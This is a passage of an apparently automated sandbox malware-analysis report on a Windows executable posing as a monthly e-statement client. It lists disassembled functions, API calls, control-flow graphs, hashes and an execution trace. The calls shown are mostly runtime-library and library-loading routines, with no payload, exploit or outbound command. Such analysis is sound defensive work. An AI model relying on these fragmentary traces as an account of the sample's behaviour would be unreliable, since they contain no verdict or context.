                                                                                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F26435
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00F2643E
                                                                                                                                                                                                                                                                      • Part of subcall function 00F262FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00F27E5B,?,00000000,?,00F2686F,?,00000004,00000000,?,?,?,00F23BCD), ref: 00F26331
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1857427562-0
                                                                                                                                                                                                                                                                    • Opcode ID: 287653e38f698402fae343ae698976a75b6325a6fb3b2edb4f930da6beadb926
                                                                                                                                                                                                                                                                    • Instruction ID: 7dfd87105e4c5683802dba2722ac716c916235be4e02321e295fb0508f37489a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 287653e38f698402fae343ae698976a75b6325a6fb3b2edb4f930da6beadb926
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F31D272A0022AABDF25EF64EC45DAE7BA5EF00320F144129FC14D7290E739CD51EBA0

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 430 f2561e-f25633 GetEnvironmentStringsW 431 f25635-f25655 call f255e7 WideCharToMultiByte 430->431 432 f2568b 430->432 431->432 438 f25657 431->438 433 f2568d-f2568f 432->433 435 f25691-f25692 FreeEnvironmentStringsW 433->435 436 f25698-f256a0 433->436 435->436 439 f25658 call f262ff 438->439 440 f2565d-f25662 439->440 441 f25680 440->441 442 f25664-f25678 WideCharToMultiByte 440->442 443 f25682-f25689 call f24869 441->443 442->441 444 f2567a-f2567e 442->444 443->433 444->443
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00F25627
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F2564A
                                                                                                                                                                                                                                                                      • Part of subcall function 00F262FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00F27E5B,?,00000000,?,00F2686F,?,00000004,00000000,?,?,?,00F23BCD), ref: 00F26331
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F25670
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F25683
                                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F25692
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2278895681-0
                                                                                                                                                                                                                                                                    • Opcode ID: 101fcba361c28e1da58a10a315d69626e25a8a3bf3d2a7ec944a42ecb67ea095
                                                                                                                                                                                                                                                                    • Instruction ID: ca6bae6f7df952a5744b9c879604a37fa38ed0f5192f6daf17185c7de81568fe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 101fcba361c28e1da58a10a315d69626e25a8a3bf3d2a7ec944a42ecb67ea095
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD017172A02A697F27215AA67C4DD7B7E6DDEC2FB13550229FD04C7140EB748C02A1B0

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 447 f244a8-f244bf GetLastError 448 f244c1-f244cb call f25904 447->448 449 f244cd-f244d2 447->449 448->449 454 f2451e-f24525 SetLastError 448->454 451 f244d4 call f2480c 449->451 453 f244d9-f244df 451->453 455 f244e1 453->455 456 f244ea-f244f8 call f2595a 453->456 457 f24527-f2452c 454->457 458 f244e2-f244e8 call f24869 455->458 463 f244fa-f244fb 456->463 464 f244fd-f24513 call f24296 call f24869 456->464 466 f24515-f2451c SetLastError 458->466 463->458 464->454 464->466 466->457
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00F247FE,00F27E79,?,00F2686F,?,00000004,00000000,?,?,?,00F23BCD,?,00000000), ref: 00F244AD
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F244E2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24509
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F24516
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F2451F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                    • Opcode ID: 74c741c3b6cb3c33989bd481dafb2dbbb57f99718b1b28b01dbed7d81b716ff4
                                                                                                                                                                                                                                                                    • Instruction ID: f8a3c0d370758bb1aeb22b6ec3f1dc5e4adef01b4d32586d23cfaec95fff117e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74c741c3b6cb3c33989bd481dafb2dbbb57f99718b1b28b01dbed7d81b716ff4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C701F476600674AB8226F6357C46F2B332EBBC17717240125FD19D21D2EFF4AD017020

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 470 f26176-f26181 471 f26183-f2618b 470->471 472 f261dc-f261de 470->472 473 f26194-f2619d 471->473 474 f2618d-f26193 call f24869 471->474 476 f261a6-f261af 473->476 477 f2619f-f261a5 call f24869 473->477 474->473 478 f261b1-f261b7 call f24869 476->478 479 f261b8-f261c1 476->479 477->476 478->479 484 f261c3-f261c9 call f24869 479->484 485 f261ca-f261d3 479->485 484->485 485->472 488 f261d5-f261db call f24869 485->488 488->472
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2618E
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: HeapFree.KERNEL32(00000000,00000000,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?), ref: 00F2487F
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: GetLastError.KERNEL32(?,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?,?), ref: 00F24891
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F261A0
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F261B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F261C4
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F261D6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: cd32aedc6f1954be583e78084207bf20b72d62f73bc8e203853b161b864dd4f7
                                                                                                                                                                                                                                                                    • Instruction ID: 7fddbd8c77f45d634235b7b94afc44e2f142f7dc7c14e3262c725d801bf94497
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd32aedc6f1954be583e78084207bf20b72d62f73bc8e203853b161b864dd4f7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9F06232A14224AF8664EB95F982C5A77DEBB40F303680805F40AD7592C734FC80A650
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F23DAD
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: HeapFree.KERNEL32(00000000,00000000,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?), ref: 00F2487F
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: GetLastError.KERNEL32(?,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?,?), ref: 00F24891
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F23DBF
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F23DD2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F23DE3
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F23DF4
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6d91f15b9014c7eafb8079ce63e2f9ae485ee11285b092ce388cd90caeaf63b9
                                                                                                                                                                                                                                                                    • Instruction ID: e5f45cdca304bc486881d39d2002b30e4076ce3da2c05217b49a2a05cc8d9522
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d91f15b9014c7eafb8079ce63e2f9ae485ee11285b092ce388cd90caeaf63b9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2F0F8B88202789FDBD96F15FD014893B63FB857303450217F9129A2B1CB791951BBC1
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe,00000104), ref: 00F22F93
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2305E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F23068
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe
                                                                                                                                                                                                                                                                    • API String ID: 2506810119-4063345880
                                                                                                                                                                                                                                                                    • Opcode ID: 1622117660730db6eaacf0051925ef2c0554c83ff476ab7bf9a67229a2ac272e
                                                                                                                                                                                                                                                                    • Instruction ID: 1578217145e38a6a160300a861c53d4be6ef70998484edb012a24fc0f5e7ca4b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1622117660730db6eaacf0051925ef2c0554c83ff476ab7bf9a67229a2ac272e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 643164B5E00268AFCB21DF99EC8199EBBBCEF85724F104066F40497251D6799E40EB61
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00F22594,00000000,?,00F31B50,?,?,?,00F22737,00000004,InitializeCriticalSectionEx,00F2BC48,InitializeCriticalSectionEx), ref: 00F225F0
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00F22594,00000000,?,00F31B50,?,?,?,00F22737,00000004,InitializeCriticalSectionEx,00F2BC48,InitializeCriticalSectionEx,00000000,?,00F224C7), ref: 00F225FA
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00F22622
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                    • Opcode ID: 45a0ca4cd689051ba70884c0ff27b77f0f186e7df11349819d4c014b84ce28ca
                                                                                                                                                                                                                                                                    • Instruction ID: 9c30e72885f4c53858fa6c693dc00ed0a5286033ac0cab700feb442685104dd5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45a0ca4cd689051ba70884c0ff27b77f0f186e7df11349819d4c014b84ce28ca
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31E04832640318BBEF225B60FC06F593F55AB10B51F104420FE0DE80E1E7A6E955B589
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00F25784,00000000,00000000,00000000,00000000,?,00F25981,00000006,FlsSetValue), ref: 00F2580F
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00F25784,00000000,00000000,00000000,00000000,?,00F25981,00000006,FlsSetValue,00F2C4D8,FlsSetValue,00000000,00000364,?,00F244F6), ref: 00F2581B
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F25784,00000000,00000000,00000000,00000000,?,00F25981,00000006,FlsSetValue,00F2C4D8,FlsSetValue,00000000), ref: 00F25829
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5e6a951ecd4180a4aa1c3d9ce6337f60dea3fc738c9ed276c755f00192bc9f0d
                                                                                                                                                                                                                                                                    • Instruction ID: 8112b66457f074c8cf143cca758d68437298885d3b6fc9df982f0420200c5403
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e6a951ecd4180a4aa1c3d9ce6337f60dea3fc738c9ed276c755f00192bc9f0d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D01A733A1563AABC7318A68BC44A977798AF45FB17250624FE1AD7140DB70DC01E6E0
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24A27
                                                                                                                                                                                                                                                                      • Part of subcall function 00F2474D: IsProcessorFeaturePresent.KERNEL32(00000017,00F2473C,00000000,?,00000004,00000000,?,?,?,?,00F24749,00000000,00000000,00000000,00000000,00000000), ref: 00F2474F
                                                                                                                                                                                                                                                                      • Part of subcall function 00F2474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00F24771
                                                                                                                                                                                                                                                                      • Part of subcall function 00F2474D: TerminateProcess.KERNEL32(00000000), ref: 00F24778
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                                    • String ID: *?$.
                                                                                                                                                                                                                                                                    • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                                    • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                                    • Instruction ID: 052224109b20c86126b0869529e6b377f341f5cd5a1c872c83f1498b911059f7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B51B375E002299FDF14DFA8DC81AAEBBB4EF48310F244169E454E7340E675AE41AB50

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:17.5%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                    Total number of Nodes:621
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:80
                                                                                                                                                                                                                                                                    execution_graph 50655 7ffaac4b6414 50658 7ffaac4b6420 50655->50658 50656 7ffaac4b65d1 50658->50656 50659 7ffaac477de0 50658->50659 50660 7ffaac477dfd 50659->50660 50662 7ffaac477e5b 50660->50662 50663 7ffaac476c00 50660->50663 50662->50658 50664 7ffaac476c09 50663->50664 50689 7ffaac472f08 50664->50689 50666 7ffaac476c8d 50667 7ffaac476d2d 50666->50667 50668 7ffaac476cdb 50666->50668 50669 7ffaac476d31 50667->50669 50670 7ffaac476d82 50667->50670 50671 7ffaac474c90 LoadLibraryExW 50668->50671 50672 7ffaac474c90 LoadLibraryExW 50669->50672 50694 7ffaac474c90 50670->50694 50676 7ffaac476cf5 50671->50676 50672->50676 50674 7ffaac476d9f 50675 7ffaac474c90 LoadLibraryExW 50674->50675 50680 7ffaac476db9 50675->50680 50678 7ffaac474c90 LoadLibraryExW 50676->50678 50683 7ffaac476d28 50676->50683 50677 7ffaac476f00 50699 7ffaac475990 50677->50699 50685 7ffaac477077 50678->50685 50680->50677 50682 7ffaac474c90 LoadLibraryExW 50680->50682 50681 7ffaac476f40 50684 7ffaac474c90 LoadLibraryExW 50681->50684 50682->50677 50683->50662 50684->50676 50686 7ffaac475990 LoadLibraryExW 50685->50686 50687 7ffaac4770af 50686->50687 50688 7ffaac474c90 LoadLibraryExW 50687->50688 50688->50683 50690 7ffaac472f0d 50689->50690 50691 7ffaac472f5a 50690->50691 50702 7ffaac472f00 50690->50702 50691->50666 50693 7ffaac475929 50693->50666 50695 7ffaac474cb8 50694->50695 50696 7ffaac474cc3 50694->50696 50695->50674 50697 7ffaac473f30 LoadLibraryExW 50696->50697 50698 7ffaac474cc8 50697->50698 50698->50674 50700 7ffaac473f30 LoadLibraryExW 50699->50700 50701 7ffaac4759b4 50700->50701 50701->50681 50703 7ffaac475990 50702->50703 50706 7ffaac473f30 50703->50706 50705 7ffaac4759b4 50705->50693 50709 7ffaac4715c8 50706->50709 50708 7ffaac473f55 50708->50705 50711 7ffaac4715d1 50709->50711 50710 7ffaac471683 50710->50708 50711->50710 50712 7ffaac471802 LoadLibraryExW 50711->50712 50713 7ffaac471836 50712->50713 50713->50708 51007 7ffaac4b0b95 51008 7ffaac477de0 LoadLibraryExW 51007->51008 51009 7ffaac4b0bbd 51008->51009 51225 7ffaac4a1f52 51227 7ffaac4a1f7f 51225->51227 51226 7ffaac4a218e 51227->51226 51228 7ffaac487700 LoadLibraryExW 51227->51228 51229 7ffaac4a1fe2 51227->51229 51228->51229 51229->51226 51230 7ffaac487700 LoadLibraryExW 51229->51230 51233 7ffaac4a201d 51229->51233 51230->51233 51231 7ffaac4a207a 51234 7ffaac487700 LoadLibraryExW 51231->51234 51237 7ffaac4a208e 51231->51237 51232 7ffaac4a2055 51232->51231 51236 7ffaac4a20a8 51232->51236 51233->51231 51233->51232 51235 7ffaac487700 LoadLibraryExW 51233->51235 51234->51237 51235->51232 51236->51237 51238 7ffaac487700 LoadLibraryExW 51236->51238 51239 7ffaac474c90 LoadLibraryExW 51237->51239 51238->51237 51240 7ffaac4a2117 51239->51240 51241 7ffaac474c90 LoadLibraryExW 51240->51241 51242 7ffaac4a213f 51241->51242 51243 7ffaac474c90 LoadLibraryExW 51242->51243 51244 7ffaac4a2172 51243->51244 51244->51226 51245 7ffaac4773d0 LoadLibraryExW 51244->51245 51246 7ffaac4a2381 51245->51246 51247 7ffaac475990 LoadLibraryExW 51246->51247 51248 7ffaac4a23a6 51247->51248 51249 7ffaac475990 LoadLibraryExW 51248->51249 51250 7ffaac4a242b 51249->51250 51251 7ffaac47a84f 51252 7ffaac47a882 51251->51252 51253 7ffaac4773d0 LoadLibraryExW 51252->51253 51254 7ffaac47a897 51253->51254 51255 7ffaac474c90 LoadLibraryExW 51254->51255 51256 7ffaac47aa63 51255->51256 51257 7ffaac47abd4 51256->51257 51260 7ffaac47aa6e 51256->51260 51258 7ffaac474c90 LoadLibraryExW 51257->51258 51259 7ffaac47ab68 51258->51259 51262 7ffaac474c90 LoadLibraryExW 51259->51262 51261 7ffaac47ab6d 51260->51261 51263 7ffaac47ab44 51260->51263 51265 7ffaac474c90 LoadLibraryExW 51261->51265 51267 7ffaac47ac08 51262->51267 51263->51259 51264 7ffaac474c90 LoadLibraryExW 51263->51264 51264->51259 51266 7ffaac47ab87 51265->51266 51268 7ffaac4aad53 51269 7ffaac4aad5f 51268->51269 51270 7ffaac4773d0 LoadLibraryExW 51269->51270 51271 7ffaac4aadcb 51270->51271 51272 7ffaac4ab062 51271->51272 51279 7ffaac4758a0 51271->51279 51276 7ffaac4ab222 51277 7ffaac4758a0 LoadLibraryExW 51276->51277 51278 7ffaac4ab433 51276->51278 51277->51276 51280 7ffaac4758c0 51279->51280 51281 7ffaac472f00 LoadLibraryExW 51280->51281 51282 7ffaac475929 51281->51282 51283 7ffaac471608 51282->51283 51285 7ffaac471611 51283->51285 51284 7ffaac471683 51284->51276 51285->51284 51286 7ffaac471802 LoadLibraryExW 51285->51286 51287 7ffaac471836 51286->51287 51287->51276 51288 7ffaac4b9459 51289 7ffaac4b9463 51288->51289 51293 7ffaac4b952a 51289->51293 51299 7ffaac490f30 LoadLibraryExW 51289->51299 51294 7ffaac4b954c 51293->51294 51295 7ffaac47a7c8 51293->51295 51297 7ffaac4b9f40 51295->51297 51296 7ffaac4b96de 51297->51296 51300 7ffaac4a73c0 51297->51300 51299->51293 51304 7ffaac4a73e5 51300->51304 51301 7ffaac4a74fd 